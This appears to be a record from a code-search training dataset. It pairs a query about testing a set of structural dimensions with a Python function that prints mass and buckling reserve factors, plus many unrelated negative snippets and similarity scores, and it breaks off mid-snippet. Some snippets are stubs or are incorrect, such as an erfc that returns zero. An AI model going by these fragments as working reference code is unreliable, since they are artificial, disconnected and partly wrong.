CapacityRequirement(\n requirement_type=\"elasticsearch-data-zonal\",\n core_reference_ghz=desires.core_reference_ghz,\n cpu_cores=certain_int(needed_cores),\n mem_gib=certain_float(needed_memory),\n disk_gib=certain_float(needed_disk),\n network_mbps=certain_float(needed_network_mbps),\n context={\n \"working_set\": min(working_set, rps_working_set),\n \"rps_working_set\": rps_working_set,\n \"disk_slo_working_set\": working_set,\n \"replication_factor\": copies_per_region,\n \"compression_ratio\": round(\n 1.0 / desires.data_shape.estimated_compression_ratio.mid, 2\n ),\n \"read_per_second\": reads_per_second,\n },\n )", "def erfc(x):\n return 0.0", "def _check_capacity_limit(self, res, amt, balance, meta, raven_vars, dispatch, t, level):\n # note \"amt\" has units of AMOUNT not RATE (resource, not resource per second)\n sign = np.sign(amt)\n # are we storing or providing?\n #print('DEBUGG supposed current level:', level)\n if sign < 0:\n # we are being asked to consume some\n cap, meta = self.get_capacity(meta, raven_vars, dispatch, t)\n available_amount = cap[res] - level\n #print('Supposed Capacity, Only calculated ins sign<0 (being asked to consumer)',cap)\n else:\n # we are being asked to produce some\n available_amount = level\n # the amount we can consume is the minimum of the requested or what's available\n delta = sign * min(available_amount, abs(amt))\n return {res: delta}, meta", "def load_factor(self):\n return round(self._n / self._size, 2)", "def recommend_contract(meter_load, percentile=100.0):\n\n load_value = np.nanpercentile(meter_load[meter_load != 0], percentile)\n\n for contract in contracts_available:\n if load_value < contract:\n return contract/kW\n\n return contracts_available[-1]/kW", "def calc_annual_electric_savings (self):\n costs = self.comp_specs['diesel generator o&m']\n\n for kW in costs.keys():\n try:\n if self.average_load < int(kW):\n maintenance = self.comp_specs['diesel generator o&m'][kW]\n break\n except ValueError:\n maintenance = self.comp_specs['diesel generator o&m'][kW]\n\n self.baseline_generation_cost = maintenance + \\\n (self.pre_intertie_generation_fuel_used * self.diesel_prices)\n\n maintenance = self.capital_costs * \\\n (self.comp_specs['percent o&m'] / 100.0)\n self.proposed_generation_cost = maintenance + \\\n self.intertie_offset_generation_fuel_used * \\\n self.intertie_diesel_prices\n self.annual_electric_savings = self.baseline_generation_cost -\\\n self.proposed_generation_cost\n #~ print len(self.annual_electric_savings)\n #~ print 'self.annual_electric_savings',self.annual_electric_savings", "def trucks_required(self) -> int:\n daily_demand = (\n self.total_demand() / self.operations.productivity.working_days_per_year\n )\n trucks_required = np.ceil(\n daily_demand\n / (self.operations.avg_vol_per_lift() * self.inputs.lifts_per_truck_day)\n )\n return trucks_required", "def balanceFactor(self):\n leftHeight = self.left.height if self.left != None else 0\n rightHeight = self.right.height if self.right != None else 0\n return rightHeight - leftHeight", "def initial_cash_balance(self) -> float:\n return self.buy_budget * len(self.stocks)", "def bcRange(self):\n\t\treturn fabs(self.Upper - self.Lower)", "def get_expected_cost(self):", "def calculate_br_down_metric(br_down):\n if br_down < 1:\n br_down = 1\n min_baud = 1200\n max_baud = 38400\n\n num = np.log(br_down) - np.log(min_baud)\n den = np.log(max_baud) - np.log(min_baud)\n\n return (num / den + 0.1).clip(min=0, max=1)", "def test_cpu_limitation(self):\n expected_dict = self.calculate_expected_values(\n load_dict=self.load_dict\n )\n assert sla_helpers.load_vm_and_check_the_load(\n load_dict=self.load_dict, expected_values=expected_dict\n )", "def _get_new_capacity(self):\n for prime in primes:\n if prime > 2 * self.size:\n return prime\n raise ValueError(\"Error: Table size overflow!\")", "def load_factor_d(self, data):\n lf_d = np.zeros((data['nr_of_fueltypes']))\n\n # Get day with maximum demand (in percentage of year)\n peak_d_demand = self.fuels_peak_d\n\n # Iterate fueltypes to calculate load factors for each fueltype\n for k, fueldata in enumerate(self.rs_fuels_tot_enduses_d):\n average_demand = np.sum(fueldata) / 365 # Averae_demand = yearly demand / nr of days\n\n if average_demand != 0:\n lf_d[k] = average_demand / peak_d_demand[k] # Calculate load factor\n\n lf_d = lf_d * 100 # Convert load factor to %\n\n return lf_d", "def calc_electric_diesel_reduction (self):\n gen_eff = self.cd[\"diesel generation efficiency\"]\n\n self.electric_diesel_reduction = self.net_generation_wind / gen_eff\n\n electric_diesel = self.generation/gen_eff\n if self.electric_diesel_reduction > electric_diesel:\n self.electric_diesel_reduction = electric_diesel", "def calc_GT_operation_partload(wdot_W, gt_size_W, eta0, m0_exhaust_from_GT_kgpers, fuel_type):\n assert wdot_W <= gt_size_W\n\n if fuel_type == 'NG':\n exitT = CC_EXIT_T_NG\n LHV = LHV_NG\n else:\n exitT = CC_EXIT_T_BG\n LHV = LHV_BG\n\n part_load_factor = (wdot_W + 1) / gt_size_W # avoid calculation errors # TODO: reference?\n if part_load_factor < GT_MIN_PART_LOAD:\n raise ValueError('The load (', wdot_W, ')is lower than minimum part load (', gt_size_W * GT_MIN_PART_LOAD, ').')\n\n eta = (0.4089 + 0.9624 * part_load_factor - 0.3726 * part_load_factor ** 2) * eta0 # (4.12) [C. Weber, 2008]_\n # mdot = (0.9934 + 0.0066 * part_load_factor) * mdot0\n T_exhaust_GT_K = (0.7379 + 0.2621 * part_load_factor) * exitT # (4.14) [C. Weber, 2008]_\n m_fuel_kgpers = wdot_W / (eta * LHV)\n\n if fuel_type == 'NG':\n m_exhaust_GT_kgpers = (103.7 * 44E-3 + 196.2 * 18E-3 + 761.4 * 28E-3 + 200.5 * 32E-3 * (CC_AIRRATIO - 1) +\n 200.5 * 3.773 * 28E-3 * (CC_AIRRATIO - 1)) * m_fuel_kgpers / 1.8156 # TODO: reference?\n\n else:\n m_exhaust_GT_kgpers = (98.5 * 44E-3 + 116 * 18E-3 + 436.8 * 28E-3 + 115.5 * 32E-3 * (CC_AIRRATIO - 1) + \\\n 115.5 * 3.773 * 28E-3 * (CC_AIRRATIO - 1)) * m_fuel_kgpers / 2.754 # TODO: reference?\n\n return eta, m_exhaust_GT_kgpers, T_exhaust_GT_K, m_fuel_kgpers", "def calculate_risk_tol(*args):\n global total_score\n risk_tol_start = 0.0\n\n for risk_per_pg in risk_tol_per_qs.iterkeys():\n try:\n risk_tol_start = risk_tol_start + risk_tol_per_qs[risk_per_pg][-1] # this is the last item in the list of each information in the page\n except IndexError:\n pass\n total_score = risk_tol_start", "def err_func(x,rv,valore,specn,lcrop,models='da2014'):\n tmp = tmp_func(x[0], x[1], rv, specn, lcrop, models)\n if tmp != 1: return abs(tmp[3]-(valore+1.)) #this is quantity that gets minimized \n else: return 1E30", "def budget_used(self):\n return int(self.total_spent() / self.budget() * 100.0)", "def real_reduce(self, bound, large_constant):\n approximation_matrix = self.generate_approximation_matrix(large_constant)\n LLL_matrix = self.generate_LLL_matrix(approximation_matrix)\n GS_matrix = self.generate_GS_matrix(LLL_matrix) \n minimal_vector_bound = self.calculate_minimal_vector_bound(large_constant, LLL_matrix, GS_matrix)\n S, T = self.calculate_S_and_T(self.coefficients[\"Z_bounds\"])\n print('ST',T**2 + S)\n new_bound = self.real_reduce_new_bound(large_constant, minimal_vector_bound, S, T)\n print('diff_bound',new_bound)\n return new_bound", "def single_center_de_needs(servers: int, DE_capacity: int) -> int:\n\n return math.ceil(servers / DE_capacity)", "def gss(self,LB,UB,tol,itr):\n \n GoldenRatio = (math.sqrt(5) + 1) / 2\n \n iterations=0\n gss=[]\n gss_x=[LB,UB]\n \n c = UB - (UB - LB) / GoldenRatio\n d = LB + (UB - LB) / GoldenRatio\n while abs(UB - LB) > tol and iterations < itr:\n if self.Func(c) < self.Func(d):\n UB = d\n gss_x.append(UB)\n iterations+=1\n else:\n LB = c\n \n gss_x.append(LB)\n iterations+=1\n c = UB - (UB - LB) / GoldenRatio\n d = LB + (UB - LB) / GoldenRatio\n \n \n #print(\" best at %.15f\"% ((UB + LB)/2) , \"itr = \",iterations)\n gss.append(gss_x)\n gss.append((LB+UB)/2)\n gss.append(iterations)\n \n return gss", "def bottles_required(beer_recipe):\r\n bottles_demanded = upcoming_future_prediction(beer_recipe)\r\n bottles_ready = delivery_information[beer_recipe]\r\n if bottles_ready > bottles_demanded:\r\n bottles_needed = 0\r\n else:\r\n bottles_needed = bottles_demanded - bottles_ready\r\n return int(bottles_demanded), bottles_ready, int(bottles_needed)" ]
[ "0.5978814", "0.58166504", "0.57432806", "0.5645041", "0.56362903", "0.5612008", "0.56099224", "0.55491924", "0.55470383", "0.55240196", "0.55133814", "0.5455415", "0.5440525", "0.5410518", "0.54084057", "0.54057515", "0.53936213", "0.5387816", "0.53826976", "0.5381602", "0.5380707", "0.53788155", "0.5361831", "0.5352453", "0.5351108", "0.53442925", "0.5342924", "0.5335802", "0.5322661", "0.530402", "0.5303664", "0.530347", "0.5297434", "0.5293838", "0.5282413", "0.5255263", "0.5252825", "0.524803", "0.52473193", "0.52371544", "0.5229624", "0.5228288", "0.522574", "0.52226675", "0.52146053", "0.52080464", "0.5207208", "0.52047914", "0.5200887", "0.5191351", "0.5188143", "0.5186163", "0.5175419", "0.5172129", "0.5171992", "0.51683956", "0.5164187", "0.51630235", "0.51609766", "0.5148888", "0.5144369", "0.5138755", "0.513478", "0.512983", "0.51272815", "0.51267266", "0.511937", "0.51141244", "0.5110717", "0.50937605", "0.5093549", "0.5083582", "0.5080394", "0.50765574", "0.507605", "0.50646925", "0.5060488", "0.505711", "0.5040375", "0.5033611", "0.50285846", "0.5019012", "0.50114226", "0.5009145", "0.50022846", "0.49942455", "0.49872074", "0.49831644", "0.49805102", "0.49802208", "0.49756026", "0.49747667", "0.49720865", "0.49628016", "0.4957792", "0.4949948", "0.49492633", "0.4948299", "0.49476707", "0.49402002" ]
0.555809
7
This function allows for testing of a set of dimensions, printing key info as a result.
def tester(dim): print("Unit Mass: " + str(mass(dim))) print("Skin Buckle RSF: " + str(skinBuckle(dim)+1)) print("Stiffener Buckle RSF: " + str(stiffenerBuckle(dim)+1)) print("Mat Fail RSF: " + str(matFail(dim)+1.1)) print("Euler Fail RSF: " + str(eulerBuckle(dim)+1.1))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def print_dict_dimensions(entities_db, title='Title', message=''):\n total = 0\n m = f'{title}\\n'\n for k1, v1 in entities_db.items():\n m += f'\\n{message}{k1}:\\n'\n if isinstance(v1, dict):\n for k2, v2 in v1.items():\n if isinstance(v2, tuple):\n m += f'{k2} {v2[0]} mapped entities, {v2[1] * 100}% input {k2} coverage.\\n'\n else:\n print()\n m += f'{k2} {v2}\\n'\n else:\n if isinstance(v1, tuple):\n m += f'{v1[0]} mapped entities, {v1[1] * 100}% input coverage\\n'\n else:\n m += f'{v1}'\n\n print(f'{m}\\n')", "def recursive_dict_key_print(dict_in, spacer=\"\"):\n if type(dict_in) is not dict:\n return\n next_spacer = spacer + \" \"\n for key, value in dict_in.items():\n try:\n print(spacer, f\"{key} : {value.shape}\")\n except(AttributeError):\n print(spacer, key)\n recursive_dict_key_print(value, next_spacer)", "def test_dimensions(self):\n\t\t\n\t\t# default\t\n\t\tdetails = self.watcher.describe()\n\t\tprint(details)\n\t\t\n\t\t# default\t\n\t\tdetails = self.watcher.describe(layers=[self.first_layer])\n\t\tprint(details)\n\t\tN = details.N.to_numpy()[0]\n\t\tM = details.M.to_numpy()[0]\n\t\trf = details.rf.to_numpy()[0]\n\t\tnum_evals = details.num_evals.to_numpy()[0]\n\t\tprint(N,M,rf,num_evals)\n\t\t\n\t\tself.assertEqual(N,64)\n\t\tself.assertEqual(M,3)\n\t\tself.assertEqual(rf,9)\n\t\tself.assertEqual(num_evals,M*rf)", "def run_print_dict_examples():\n print()\n print_dict_keys(NAME_DICT)\n print()\n print_dict_items(NAME_DICT)", "def run_print_dict_examples():\n print()\n print_dict_keys(NAME_DICT)\n print()\n print_dict_items(NAME_DICT)", "def printt(dictionnary):\n for key, value in dictionnary.iteritems():\n print('{key}, size: {size}, {values}'.format(key=key, \n size=len(value), values=value[0:4]))", "def report_keyset(self):\n for i, matchset in enumerate(self.matches):\n if len(matchset) == 1:\n print \"[%02d]\" % i, fmt(sorted([k for k, data in matchset.items()]), BLUE)\n elif len(matchset) != 0:\n print \"[%02d]\" % i, fmt(sorted([k for k, data in matchset.items()]), WHITE)\n else:\n print \"[%02d]\" % i, fmt(\"[X]\", RED)", "def printDict(myDict):\n for key in myDict:\n print(f\"Version: --> {myDict[key]['version']} \")\n print(f\"Accuracy: --> {myDict[key]['accuracy']}\")\n print(f\"Time --> {myDict[key]['time_per_target']}\")\n print(f\"Penalty --> {myDict[key]['target_w_penalty']}\")\n print(f\"ID --> {myDict[key]['assessed_by']}\")\n print(f\"# --> {myDict[key]['attempt']}\")\n\n print()", "def metadata_print(metadata):\n\n print('{0:<10} {1}'.format('parameter', 'value'))\n for key in metadata:\n print('{0:<10} {1}'.format(key, metadata[key]))", "def printMap(values, klab, vlab, precision, offset=16):\n\tprint(klab.ljust(offset, \" \") + vlab)\n\tfor k in values.keys():\n\t\tv = values[k]\n\t\tks = toStr(k, precision).ljust(offset, \" \")\n\t\tvs = toStr(v, precision)\n\t\tprint(ks + vs)", "def printValues(self):\n\n for layer in self.LayerNames:\n print \"-------- {0} --------\".format(layer)\n print \"nWorkingModules: {0}\".format(self.nWorkingModules[layer])\n print \"Pixels per Layer\"\n print \" Pixels hit: {0}\".format(self.hitPix[layer])\n print \" Occupancy: {0}\".format(self.occupancies[layer])\n print \" Pixels hit per Module: {0}\".format(self.hitPixPerModule[layer])\n print \" Pixels hit per Area: {0}\".format(self.hitPixPerArea[layer])\n print \" Pixels hit per Area per sec: {0}\".format(self.hitPixPerAreaSec[layer])\n print \"Pixels per Det\"\n print \" Occupancy (Det): {0}\".format(self.Detoccupancies[layer])\n print \" Pixels hit per Det: {0}\".format(self.hitPixPerDet[layer])\n print \" Pixels hit per DetArea: {0}\".format(self.hitPixPerDetArea[layer])\n print \" Pixels hit per DetArea per sec: {0}\".format(self.hitPixPerDetAreaSec[layer])\n print \"Cluster per Layer\"\n print \" Clusters hit: {0}\".format(self.hitClusters[layer])\n print \" Clusters hit per module: {0}\".format(self.hitClustersPerModule[layer])\n print \" Clusters hit per Area: {0}\".format(self.hitClustersPerArea[layer])\n print \" Clusters hit per Area per sec: {0}\".format(self.hitClustersPerAreaSec[layer])\n print \"Clusters per Det\"\n print \" Clusters hit per Det: {0}\".format(self.hitClustersPerDet[layer])\n print \" Clusters hit per DetArea: {0}\".format(self.hitClustersPerDetArea[layer])\n print \" Clusters hit per DetArea per sec: {0}\".format(self.hitClustersPerDetAreaSec[layer])", "def test_get_dimension(self):\n\n v = Vector({ 'x': 1 })\n self.assertEqual(1, v.dimensions['x'])", "def printInfo(matrix):\n\n print(\"Groups:\")\n for group in matrix.matrix.group_labels:\n print(\"\\t{0}\".format(group))\n\n print(\"Samples:\")\n for sample in matrix.matrix.sample_labels:\n print(\"\\t{0}\".format(sample))", "def main():\n dims = params['dims']\n\n for d in dims:\n print('**** Running test for d={0:d} ****'.format(d))\n run_test(d)", "def visualize_debug(example_dict, prefix):\n region_string = example_dict[\"example_metadata\"][0].strip(\"\\x00\").split(\";\")[0].split(\"=\")[1].replace(\":\", \"-\")\n region_prefix = \"{}.{}\".format(prefix, region_string)\n \n for key in example_dict.keys():\n\n # visualize importances\n if \"importances\" in key:\n plot_name = \"{}.{}.pdf\".format(region_prefix, key)\n print plot_name\n plot_weights(np.squeeze(example_dict[key]), plot_name)\n\n # visualize pwm scores\n if \"pwm-scores\" in key:\n pass\n \n\n return None", "def test_has_correct_number_of_keys_and_values(self):\n self.has_correct_number_of_keys_and_values(2, 1)", "def test_has_correct_number_of_keys_and_values(self):\n self.has_correct_number_of_keys_and_values(2, 1)", "def print_image(img):\n for k in img:\n print(\"\".join([str(x) for x in k] ))", "def display_dict() -> None:\n for key in ascii_dict:\n print(key, ': ')\n for line in ascii_dict[key]:\n print(line)", "def show_info(self, group):\n print(group)\n for child in self.dict[group]:\n if child=='Version':\n print(child, ':', self(group, child))\n elif not self(group, child).shape:\n print(child, ':',self(group, child))\n else:\n print(child,': size', self(group, child).shape)", "def _format_dimensions(dimensions):\n if not dimensions:\n return \"\"\n\n dim_pairs = [\"%s=%s\" % (k, v) for k, v in dimensions.items()]\n return \"[%s]\" % (\",\".join(dim_pairs))", "def print_table():\n for key in _op_table.keys():\n print(key)\n for sub_key in _op_table[key]:\n print('\\t--' + sub_key)", "def debug(self):\n \n #path\n print('Path information:')\n for k, v in self.__path.items():\n print(k, v)\n \n #sample count\n print('Sample statistic of each phase')\n for k, v in self.__phase_sample_count.items():\n print(k, v)\n \n print('Sample statistic of each class')\n for k, v in self.__area_sample_count.items():\n print(k, v)\n \n print('Sample statistic of each train')\n for k, v in self.__train_sample_count.items():\n print(k, v)", "def recursively_print_structure(item, leading = ''):\n for key in item:\n if isinstance(item[key], h5py.Dataset):\n print(leading + key + ': ' + str(item[key].shape))\n else:\n print(leading + key)\n recursively_print_structure(item[key], leading + ' ')", "def printResults(self):\n for key in self.mDict.keys():\n print ('for {:d}, entries = {:d} and exits = {:d}'.format (key, self.mDict.get(key).get ('entries'), self.mDict.get(key).get ('exits')))", "def print_configuration_info():\n print(\"Selected dataset:\", DATASET) \n print(\"Dataset base directory:\", BASE_INPUT_DIR) \n print(\"Daytime option:\", DAYTIME) \n print(\"Nones option:\", NONES) \n print(\"Selected action/activity representation:\", OP)\n print(\"Number of epochs: \", EPOCHS)\n print(\"Number of folds for cross-validation: \", FOLDS)\n print(\"Input directory for data files:\", INPUT_DIR) \n print(\"Embedding matrix file:\", EMBEDDING_WEIGHTS)\n print(\"Action sequences (X) file:\", X_FILE) \n print(\"Word embedding file for activities:\", ACTIVITY_EMBEDDINGS) \n print(\"Activity to int mappings:\", ACTIVITY_TO_INT)\n print(\"Int to activity mappings:\", INT_TO_ACTIVITY) \n print(\"Experiment ID:\", EXPERIMENT_ID)\n print(\"Treat imbalance data:\", TREAT_IMBALANCE)\n print(\"Save intermediate plots:\", SAVE)\n print(\"Batch size:\", BATCH_SIZE)\n print(\"Dropout:\", DROPOUT)\n print(\"Loss:\", LOSS)", "def show(matrix):\n print(\"\",end=\" \")\n for k in sorted(matrix.keys()):\n print(k,end=\" \")\n \n for i,row in sorted(matrix.items()):\n print(\"\\n\" + str(i),end=\" \")\n for j in row:\n print(matrix[i][j],end=\" \")\n print()", "def print_anagram_sets(d):\r\n for v in d.values():\r\n if len(v) > 1:\r\n print(len(v), v)", "def print_info(self, i):\n\n im_size = self.image_size(i)\n print 'The path of the image is: {}'.format(self.image_path_at(i))\n print 'width: {}, height: {}'.format(im_size[0], im_size[1])\n \n attr_i = self.gtdb['attr'][i, :]\n print 'The attributes are: {}'.format(','.join([self._classes[i] for i in np.where(attr_i==1)[0]]))", "def printsection(section):\n print('===')\n for key in section.keys():\n print(\"Key: %s\" % key)\n for item in section[key]:\n print(' %s' % item)", "def view_shapes(xm_train, xm_dev, xm_test, ym_train, ym_dev, ym_test):\n\n print('X_train shape: ' + str(xm_train.shape))\n print('Y_train shape: ' + str(ym_train.shape))\n print('X_dev shape: ' + str(xm_dev.shape))\n print('Y_dev shape: ' + str(ym_dev.shape))\n print('X_test shape: ' + str(xm_test.shape))\n print('Y_test shape: ' + str(ym_test.shape))\n print('\\n')", "def dimensions():", "def print_model_definitions(self):\n sys.stdout.write(\"Model Dimensions\\n\")\n sys.stdout.write(\"----------------\\n\")\n for key, val in self.dimensions.iteritems():\n sys.stdout.write(\"{key}: {val}\\n\".format(key=key, val=val))", "def print_kwargs(**kwargs):\n for key in kwargs:\n print('%s %s' %(key, kwargs[key]))", "def test_keys(self):\n obs = self.tester.keys()\n self.assertTrue(isinstance(obs, Iterable))\n self.assertEqual(set(obs), self.exp_categories)", "def test_keys(self):\n obs = self.tester.keys()\n self.assertTrue(isinstance(obs, Iterable))\n self.assertEqual(set(obs), self.exp_categories)", "def show_shape_metrics(shape):", "def test_basic_property_of_random_matrix():\n for name, random_matrix in all_random_matrix.items():\n print(name)\n\n check_input_size_random_matrix(random_matrix)\n check_size_generated(random_matrix)\n if name != \"random_subsample_normalized\":\n check_zero_mean_and_unit_norm(random_matrix)\n check_approximate_isometry(random_matrix)", "def test_RegionDimensionsBox_extractFromLinesWithKey(self):\r\n\r\n regionDimensions = RegionDimensions.RegionDimensionsBox()\r\n\r\n numberParameters = 6\r\n self.assertEquals(numberParameters, len(regionDimensions._keys))\r\n\r\n line = \"RegionParameters=0.000000 10000000000.000000 -10000000000.000000 10000000000.000000 0.000000 20000000000.000000\"\r\n regionDimensions.extractFromLinesWithKey(line)\r\n\r\n self.assertEquals(0.0, regionDimensions.minimumX)\r\n self.assertEquals(10000000000.0, regionDimensions.maximumX)\r\n self.assertEquals(-10000000000.0, regionDimensions.minimumY)\r\n self.assertEquals(10000000000.0, regionDimensions.maximumY)\r\n self.assertEquals(0.0, regionDimensions.minimumZ)\r\n self.assertEquals(20000000000.0, regionDimensions.maximumZ)\r\n\r\n #self.fail(\"Test if the testcase is working.\")\r", "def print_config(config_dic, logger):\n for k, v in config_dic.items():\n logger.info(\"{}:\\t{}\".format(k.ljust(15), v))", "def print_q(q):\n for key in sorted(q.keys()):\n print(key, end=\" \")\n value = q[key]\n for i in range(len(value)):\n print(value[i], end=\" \")\n print()", "def dimension_check():\n print(\"### DIMENSION CHECK ###\")\n print(X.shape,\n y.shape,\n X_train.shape,\n y_train.shape,\n X_test.shape,\n y_test.shape,\n weights.shape)\n print(\"### END ###\")", "def print_metric_dict(self, metric_dict):\n print(\"\".join([\" {}: {:4f},\".format(k, v) for k, v in metric_dict.items()]))", "def printdict(input_dict):\n for key in input_dict:\n print key, \":\", input_dict[key]", "def print_device_dict(device_dict):\n for device_id in device_dict:\n print(str(device_id) + ':', device_dict[device_id]['name'])", "def info(d, return_dict=False, print_=True):\n info_ = {}\n for k,v in d.items():\n if isinstance(v, dict):\n info_.update(info(v))\n else:\n info_[k] = {\n 'size': np.asarray(v).ravel().shape,\n 'shape' :np.asarray(v).shape,\n 'dtype': np.asarray(v).dtype.name\n }\n if print_:\n _v = np.asarray(v)\n print('key -', k)\n print('dtype -', _v.dtype.name)\n print('size -', np.asarray(v).ravel().shape)\n print('shape -', _v.shape)\n print()\n if return_dict:\n return info_", "def test_keys(self):\n obs = self.tester.keys()\n self.assertTrue(isinstance(obs, Iterable))\n self.assertEqual(set(obs), self.exp_sample_ids)", "def test_keys(self):\n obs = self.tester.keys()\n self.assertTrue(isinstance(obs, Iterable))\n self.assertEqual(set(obs), self.exp_sample_ids)", "def print_output():\n print(\"count: [primary: \"+str(primary_shards)+\", replica: \"+str(secondary_shards)+\"]\")\n print(\"size: [primary: \"+pretty_print_storage(total_size_primary)+\", replica: \"+pretty_print_storage(total_size_secondary)+\"]\")\n print(\"disk-max-node: \"+max_size_node_name)\n print(\"watermark-breached: \"+str(watermark_breached))", "def info(self, n=80):\n # concatenate list of index dimensions and levels\n info = f\"{type(self)}\\nIndex dimensions and data coordinates:\\n\"\n c1 = max([len(i) for i in self.dimensions]) + 1\n c2 = n - c1 - 5\n info += \"\\n\".join(\n [\n f\" {i:{c1}}: {print_list(getattr(self, i), c2)}\"\n for i in self.dimensions\n ]\n )\n\n return info", "def show_map(map_):\n for r in map_.matrix:\n print(''.join(r))\n print()", "def display(self):\n # type: ()->None\n print('============')\n for key, value in self._ifAttributes.items():\n if isinstance(value, list):\n print(key + ': ')\n for item in value:\n print('\\t' + item)\n elif isinstance(value, dict):\n print(key + ': ')\n for item in value.keys():\n print('\\t' + item + ': ' + value[item])\n else:\n print(key + ': ' + str(value))\n print('============')", "def dimension_testing(self, dimension):\n if dimension in self.allowed_dimensions:\n return ''\n else:\n error_msg = 'Dimension %s is not supported. Choose from %s' % (dimension, self.allowed_dimensions)\n return error_msg", "def print_map(self):\n y_max,x_max = map(max, zip(*self.mp.keys()))\n for row in range(0,y_max+1):\n msg = []\n for k in range(0,x_max+1):\n msg.append(chr(self.mp[row,k]))\n print(\"\".join(msg))", "def display_layers(layers, wide, tall):\n\n colours = {\n \"0\": \" \",\n \"1\": \" # \",\n }\n\n for row in range(tall):\n for col in range(wide):\n pixels = [layer[row][col] for layer in layers]\n line = next(colours[p] for p in pixels if p in colours)\n print(line, end=\"\")\n print()", "def print_infrastructure(aws_key, aws_secret):\n _, _, _, redshift_client = create_clients(aws_key, aws_secret)\n for k, v in get_cluster_properties(redshift_client):\n print(k, v)", "def valid_config_keys():\n click.echo(', '.join(get_class_properties(GenConfig)))", "def printPicnic(itemsDict: dict, leftWidth: int, rightWidth: int) -> None:\n print('PICNIC ITEMS'.center(leftWidth + rightWidth, '-'))\n for k, v in itemsDict.items():\n print(k.ljust(leftWidth, '.') + str(v).rjust(rightWidth))", "def show_values():\n dic_drg = {}\n dic_age = {}\n dic_sex = {}\n dic_sline = {}\n for tup in all_data:\n drg = tup[7]\n age = tup[9]\n sex = tup[10]\n sline = tup[14]\n\n dic_drg[drg] = 1\n dic_age[age] = 1\n dic_sex[sex] = 1\n dic_sline[sline] = 1\n\n print \"Age values\"\n for key in sorted(dic_age.keys()):\n print key\n\n print \"Sex values\"\n for key in sorted(dic_sex.keys()):\n print key\n\n print \"Service line values\"\n for key in sorted(dic_sline.keys()):\n if key is None or len(key) == 0:\n continue\n print \"'\" + key + \"',\",\n print\n\n print \"Drg values\"\n for key in sorted(dic_drg.keys()):\n if key is None or len(key) == 0:\n continue\n print\"'\" + key + \"',\",\n print", "def test_section_keys(self):\n ars = self.ar[2009][11]['general']\n self.assertEqual(ars.keys(), self.__class__.wanted_lines)", "def test_getitem(self):\n space = Space()\n probs = (0.1, 0.2, 0.3, 0.4)\n categories = (\"asdfa\", 2, 3, 4)\n dim = Categorical(\"yolo\", OrderedDict(zip(categories, probs)), shape=2)\n space.register(dim)\n dim = Integer(\"yolo2\", \"uniform\", -3, 6)\n space.register(dim)\n dim = Real(\"yolo3\", \"norm\", 0.9)\n space.register(dim)\n\n assert space[\"yolo\"].type == \"categorical\"\n assert space[0].type == \"categorical\"\n\n with pytest.raises(KeyError):\n space[\"asdf\"]\n\n with pytest.raises(IndexError):\n space[3]", "def test_main_multiple_keys(self):\n args = [\n \"--layout\",\n self.layout_double_signed_path,\n \"--layout-keys\",\n self.alice_path,\n self.bob_path,\n ]\n self.assert_cli_sys_exit(args, 0)", "def test_main_multiple_keys(self):\n args = [\n \"--layout\",\n self.layout_double_signed_path,\n \"--layout-keys\",\n self.alice_path,\n self.bob_path,\n ]\n self.assert_cli_sys_exit(args, 0)", "def test_partially_one(self):\n setups = self.get_setup().decompress([\"dimensions.species_id\"])\n assert isinstance(setups, PlotSetupGroup)\n assert all(isinstance(setup, PlotSetup) for setup in setups)\n assert len(setups) == 2\n res = {\n (\n s.panels.collect_equal(\"dimensions\").variable,\n s.panels.collect_equal(\"dimensions\").species_id,\n s.panels.collect_equal(\"dimensions\").time,\n )\n for s in setups\n }\n sol = {\n ((\"dry_deposition\", \"wet_deposition\"), 1, (1, 2, 3)),\n ((\"dry_deposition\", \"wet_deposition\"), 2, (1, 2, 3)),\n }\n assert res == sol", "def test_all_keys(self):\n\t\tdocumentation: dict = self.handlerObject.build_swagger_documentation()\n\t\t# print(\"Test documentation was generated. The corresponding object is:\\n{0}\".format(documentation))\n\t\tself.assertTrue(compare_keys(documentation, TEST_ALL_KEYS_EXPECTED_OUTPUT))", "def cli(dimensions):\r\n click.echo(\"Iris Flower classifier\\n\")\r\n \r\n\r\n click.echo(\"Calculating result...\")\r\n time.sleep(1)\r\n results = zip(dimm_names, dimensions)\r\n click.echo(\"Input data:\")\r\n for i, j in results:\r\n click.echo(\"{:12} -> {}\".format(i, j))\r\n\r\n click.echo()\r\n click.echo(\"Your flower seems to be fine example of:\")\r\n click.secho(\"{}\".format(\"species\"), fg='green', bold=True)", "def check_and_print_if_error(self): # pragma: no cover\n dupes, empties, not_detected = self._get_aberrations()\n if dupes:\n print 'duplicate entries for:'\n for dup, matches in dupes:\n print ' %s: %s' % (dup, [f.func_name for f in matches])\n if empties:\n print 'empty entries for:'\n for empty in empties:\n print ' ' + str(empty)\n if not_detected:\n print 'dimensions not detected:'\n for n_d in not_detected:\n print ' ' + str(n_d)\n return self.is_correct", "def test_dict_keywords(self):\n output, _err = self.executor.docker.run('lego:1', env=dict(SPECIAL='emett',\n SONG='awesome')).batch()\n self.assertEqual(output, 'everything')", "def printDicts():\n for k in key:\n print k, key[k]\n \n for f in freq:\n print f, freq[f]\n \n for e in english:\n print e, english[e]", "def print_data():\r\n\r\n d = data()\r\n for i in d:\r\n for key, value in i.items():\r\n print(key, \" : \", value)\r\n print()", "def test_get_dimensions_by_label(self):\n\n dimensions, dim_names = pyjstat.get_dimensions(\n self.oecd_datasets['oecd'], 'label')\n self.assertTrue(dim_names[2] == '2003-2014')\n self.assertTrue(dimensions[0].iloc[0]['label'] == 'Unemployment rate')", "def print_possibility_space():\n\n print(\"Possibility space:\")\n print(\" {} unique sword images\".format(calculate_image_possibilities()))", "def test_product_initialization(product_design_space):\n assert product_design_space.name == 'my design space'\n assert product_design_space.description == 'does some things'\n assert len(product_design_space.dimensions) == 3\n assert product_design_space.dimensions[0].descriptor.key == 'alpha'\n assert product_design_space.dimensions[1].descriptor.key == 'beta'\n assert product_design_space.dimensions[2].descriptor.key == 'gamma'", "def print_img_data(img,title='Image'):\n print(f'________ {title} _______')\n if len(image.shape) == 2:\n print(f'min:{img.min()} max:{img.max()} shape:{img.shape}\\\n\\nmean:{img.mean()} std:{img.std()} type:{type(img[0,0])}\\n')\n elif len(image.shape) == 3:\n print(f'min:{img.min()} max:{img.max()} shape:{img.shape}\\\n\\nmean:{img.mean()} std:{img.std()} type:{type(img[0,0,0])}\\n')", "def test17():\n\n\twardrobe = {\"shirt\":[\"red\",\"blue\",\"white\"], \"jeans\":[\"blue\",\"black\"]}\n\tfor cloth in wardrobe.keys():\n\t\tfor color in 